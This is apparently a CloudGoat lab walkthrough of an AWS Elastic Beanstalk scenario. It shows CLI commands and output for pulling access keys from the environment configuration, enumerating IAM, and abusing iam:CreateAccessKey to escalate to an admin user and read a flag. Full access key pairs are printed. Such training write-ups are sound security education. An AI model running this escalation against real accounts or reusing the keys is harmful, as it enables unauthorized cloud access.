CloudGoat: Beanstalk Secrets Walkthrough
Contents
AWS Elastic Beanstalk
Elastic Beanstalk is AWS’s Platform-as-a-Service (PaaS) for web applications and services—letting you deploy code and immediately handle the heavy lifting of capacity provisioning, load balancing, auto-scaling, application health monitoring and updates.
- Automated Infrastructure
- Provisions EC2 instances, Load Balancers, and Auto Scaling Groups
- Manages capacity, deployments (rolling, immutable, blue/green), health checks, and scaling rules
How it works
You simply upload your application code (Node.js, Python, Java, .NET, etc.), choose an execution platform, and Elastic Beanstalk orchestrates the underlying AWS resources. This streamlines deployments, abstracts away infrastructure complexity, and lets you focus squarely on your application logic.
Elastic Beanstalk Secret Exposure
- A common misconfiguration in Elastic Beanstalk is exposing sensitive data through environment variables or application source code.
- Developers often set environment properties such as:
- Database connection strings
- API keys
- AWS credentials
- These values can be accessed by users with permissions to read the environment configuration.
- Application source code stored in S3 (as part of the Beanstalk deployment) might include:
- Hardcoded secrets
- API tokens
- AWS access keys
- This issue isn’t exclusive to Beanstalk — it’s a common cloud security misstep.
- Best Practice: Always store secrets in AWS Secrets Manager, not in environment variables or embedded in code.
- Leaked secrets can lead to:
- Privilege escalation
- Data exposure
- Lateral movement within the AWS account
- While Elastic Beanstalk abstracts infrastructure, securing configurations and sensitive data is the customer’s responsibility.
Initial Access
Credentials
Access Key: AKIA2K3L7SQOUGEKVP4I
Secret Key: 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- The user has access to the Elastic Beanstalk service
Enumeration
Run the following command to login as beanstalk:
aws configure --profile beanstalk
AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxx
AWS Secret Access Key [None]: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Default region name [None]: us-east-1 # or your preferred region
Default output format [None]: json # or 'text' or 'table'Verify the access
└─$ aws sts get-caller-identity --profile beanstalk
{
"UserId": "AIDA2K3L7SQOZFHAQ7TEN",
"Account": "710506681373",
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_low_priv_user"
}
Found an application hosted on Elastic Beanstalk
└─$ aws elasticbeanstalk describe-applications --query "Applications[*].{Name:ApplicationName,Versions:VersionLabels}" --output table --profile beanstalk
------------------------------------
| DescribeApplications |
+---------------------+------------+
| Name | Versions |
+---------------------+------------+
| cgidtkpw8slyli-app | None |
+---------------------+------------+Discovered an Elastic Beanstalk environment
└─$ aws elasticbeanstalk describe-environments --query "Environments[*].{App:ApplicationName,Env:EnvironmentName,Status:Status,URL:CNAME}" --output table --profile beanstalk
--------------------------------------------------------------------------------------------------------------------------
| DescribeEnvironments |
+--------------------+---------------------+---------+-------------------------------------------------------------------+
| App | Env | Status | URL |
+--------------------+---------------------+---------+-------------------------------------------------------------------+
| cgidtkpw8slyli-app| cgidtkpw8slyli-env | Ready | cgidtkpw8slyli-env.eba-iftrmxpw.us-east-1.elasticbeanstalk.com |
+--------------------+---------------------+---------+-------------------------------------------------------------------+Accessing the Application via the Web
Running a Python application that is accessible through the web.
Found credentials in the application’s configuration
aws elasticbeanstalk describe-configuration-settings --application-name cgidtkpw8slyli-app --environment-name cgidtkpw8slyli-env --output yaml --profile beanstalk | grep -E '(ACCESS|SECRET)_KEY'
Value: SECONDARY_SECRET_KEY=XtrLABjEhyT6I2NUlneNDE9YBeMafgzfAxveSQCZ,PYTHONPATH=/var/app/venv/staging-LQM1lest/bin,SECONDARY_ACCESS_KEY=AKIA2K3L7SQOVXOHGYFMSince the output was large, I used
grepto extract the access key and secret key
Whoami for the Discovered Credentials
Run the following command to login as secondary_creds:
aws configure --profile secondary_creds
AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxx
AWS Secret Access Key [None]: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Default region name [None]: us-east-1 # or your preferred region
Default output format [None]: json # or 'text' or 'table'Verify the access
└─$ aws sts get-caller-identity --profile secondary_creds
{
"UserId": "AIDA2K3L7SQOYHBOFYMWJ",
"Account": "710506681373",
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_secondary_user"
}Users Found
{
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_admin_user",
"CreateDate": "Fri, 20 Jun 2025 06:49:17",
"Path": "/",
"UserId": "AIDA2K3L7SQO4LQ4YK4LF",
"UserName": "cgidtkpw8slyli_admin_user"
},
{
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_low_priv_user",
"CreateDate": "Fri, 20 Jun 2025 06:49:17",
"Path": "/",
"UserId": "AIDA2K3L7SQOZFHAQ7TEN",
"UserName": "cgidtkpw8slyli_low_priv_user"
},
{
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_secondary_user",
"CreateDate": "Fri, 20 Jun 2025 06:49:17",
"Path": "/",
"UserId": "AIDA2K3L7SQOYHBOFYMWJ",
"UserName": "cgidtkpw8slyli_secondary_user"
}Let’s check the policies to see whether we can escalate from the secondary user to the admin user
Policies attached to the User
└─$ aws iam list-attached-user-policies --user-name cgidtkpw8slyli_secondary_user --profile secondary_creds
{
"AttachedPolicies": [
{
"PolicyName": "cgidtkpw8slyli_secondary_policy",
"PolicyArn": "arn:aws:iam::710506681373:policy/cgidtkpw8slyli_secondary_policy"
}
]
}
Roles found apart from AWS service role
{
"Path": "/",
"RoleName": "cgidtkpw8slyli_eb_instance_role",
"RoleId": "AROA2K3L7SQOQH7CHRWJM",
"Arn": "arn:aws:iam::710506681373:role/cgidtkpw8slyli_eb_instance_role",
"CreateDate": "2025-06-20T06:49:17+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "cgidtkpw8slyli_eb_service_role",
"RoleId": "AROA2K3L7SQOXT44YKHLR",
"Arn": "arn:aws:iam::710506681373:role/cgidtkpw8slyli_eb_service_role",
"CreateDate": "2025-06-20T06:49:17+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "elasticbeanstalk.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}Nothing Interesting here
Secondary user permissions
└─$ aws iam get-policy-version --policy-arn arn:aws:iam::710506681373:policy/cgidtkpw8slyli_secondary_policy --version-id v1 --profile secondary_creds
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
},
{
"Action": [
"iam:ListRoles",
"iam:GetRole",
"iam:ListPolicies",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetPolicyVersion",
"iam:ListUsers",
"iam:GetUser",
"iam:ListGroups",
"iam:GetGroup",
"iam:ListAttachedUserPolicies",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-06-20T06:49:17+00:00"
}
}The user has permission to create access keys. We can check whether it’s possible to create a new access key for the discovered admin user.
Admin User Permission
└─$ aws iam get-policy-version --policy-arn arn:aws:iam::710506681373:policy/cgidtkpw8slyli_admin_user_policy --version-id v1 --profile secondary_creds
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": "*",
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-06-20T06:49:17+00:00"
}
}
Verifying whether the
admin_user, identified during earlier enumeration, has access to all resources by reviewing the attached IAM policies.
Privilege Escalation
Abusing the CreateAccessKey permission assigned to the secondary user
└─$ aws iam create-access-key --user-name cgidtkpw8slyli_admin_user --profile secondary_creds --query "AccessKey.{ID:AccessKeyId,Secret:SecretAccessKey}" --output table
----------------------------------------------------------------------
| CreateAccessKey |
+-----------------------+--------------------------------------------+
| ID | Secret |
+-----------------------+--------------------------------------------+
| AKIA2K3L7SQOYAPTLBXW | dp5EQixZKxPp8efUd0ffduSjmmeuccgOCLrUWfrr |
+-----------------------+--------------------------------------------+Used the
CreateAccessKeyPermission to generate a new access key and secret for the admin user, successfully escalating privileges
Login as admin_user
Run the following command to login as admin_user:
aws configure --profile admin_user
AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxx
AWS Secret Access Key [None]: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Default region name [None]: us-east-1 # or your preferred region
Default output format [None]: json # or 'text' or 'table'Verify the access
└─$ aws sts get-caller-identity --profile admin_user
{
"UserId": "AIDA2K3L7SQO4LQ4YK4LF",
"Account": "710506681373",
"Arn": "arn:aws:iam::710506681373:user/cgidtkpw8slyli_admin_user"
}Flag Enumeration
Enumerating secrets stored in AWS Secrets Manager
└─$ aws secretsmanager list-secrets --profile admin_user
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:710506681373:secret:cgidtkpw8slyli_final_flag-MMZqVO",
"Name": "cgidtkpw8slyli_final_flag",
"LastChangedDate": "2025-06-20T12:19:18.324000+05:30",
"LastAccessedDate": "2025-06-20T05:30:00+05:30",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
],
"SecretVersionsToStages": {
"terraform-20250620064917990300000002": [
"AWSCURRENT"
]
},
"CreatedDate": "2025-06-20T12:19:16.824000+05:30"
}
]
}Value to be used to fetch the secret:
secrets-id=cgidtkpw8slyli_final_flag-MMZqVO
└─$ aws secretsmanager get-secret-value --secret-id cgidtkpw8slyli_final_flag --profile admin_user
{
"ARN": "arn:aws:secretsmanager:us-east-1:710506681373:secret:cgidtkpw8slyli_final_flag-MMZqVO",
"Name": "cgidtkpw8slyli_final_flag",
"VersionId": "terraform-20250620064917990300000002",
"SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2025-06-20T12:19:18.320000+05:30"
}Secret Found : FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}